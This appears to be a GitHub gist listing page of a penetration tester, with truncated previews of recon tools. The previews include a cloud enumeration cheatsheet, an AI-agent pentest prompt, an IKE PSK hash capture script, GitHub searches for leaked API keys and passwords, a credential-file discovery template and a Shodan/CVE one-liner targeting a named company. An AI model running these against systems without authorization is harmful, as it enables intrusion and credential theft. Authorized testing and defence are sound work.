nullenc0de
nullenc0de
/ External Penetration Testing Commands
Last active
January 22, 2026 01:25
External Penetration Testing Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # External Penetration Testing Cheatsheet | |
| ## 1. Reconnaissance | |
| ### Cloud Enumeration | |
| # Cloud Infrastructure Discovery | |
| ./cloud_enum.py -k somecompany | |
| # Third Party Misconfigurations |
nullenc0de
/ external_pentest.yaml
Created
April 7, 2025 20:56
nerve run external.yaml --target "example.com"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| agent: > | |
| You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`. | |
| ## Instructions | |
| - Target external assets specified via {{ target }} (e.g., public IPs, domains). | |
| - Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation. | |
| - Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed. | |
| - Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses). | |
| - Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions. | |
| - Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut |
nullenc0de
/ ike_psk_capture.sh
Created
January 6, 2026 18:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # IKE PSK Hash Capture Tool | |
| # Captures Pre-Shared Key hashes from IKEv1 VPNs with Aggressive Mode enabled | |
| # | |
| # Usage: ./ike_psk_capture.sh <target_ip> [group_name] | |
| # | |
| RED='\033[0;31m' | |
| GREEN='\033[0;92m' |
nullenc0de
/ ad_tools_installer.sh
Created
December 22, 2025 19:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # LinWinPwn Missing Tools Installer | |
| # Installs all tools that linWinPwn checks for but doesn't install by default | |
| # Run with sudo: sudo bash linwinpwn_missing_tools.sh | |
| set -e | |
| scripts_dir="/opt/lwp-scripts" | |
| current_user="${SUDO_USER:-$(whoami)}" |
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
December 5, 2025 00:25
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 1 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 2 |
nullenc0de
/ auto_git_query
Last active
October 26, 2025 00:41
Automated Github Queries (Can open 29 tabs at a time)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
nullenc0de
/ config.yaml
Last active
October 13, 2025 23:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: sensitive-credential-files | |
| info: | |
| name: Sensitive Credential File Discovery | |
| author: nullenc0de | |
| severity: high | |
| description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | |
| cvss-score: 7.5 |
nullenc0de
/ Shodan_scan
Last active
October 11, 2025 06:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt | |
| subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt |
nullenc0de
/ suspicious-extensions-rce.yaml
Created
August 16, 2024 13:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: suspicious-extensions-rce | |
| info: | |
| name: Suspicious File Extensions - Potential RCE | |
| author: Nullenc0de | |
| severity: medium | |
| description: Detects files with potentially suspicious extensions that could be used for Remote Code Execution (RCE). Scan your AppData folder. | |
| file: | |
| - extensions: |
NewerOlder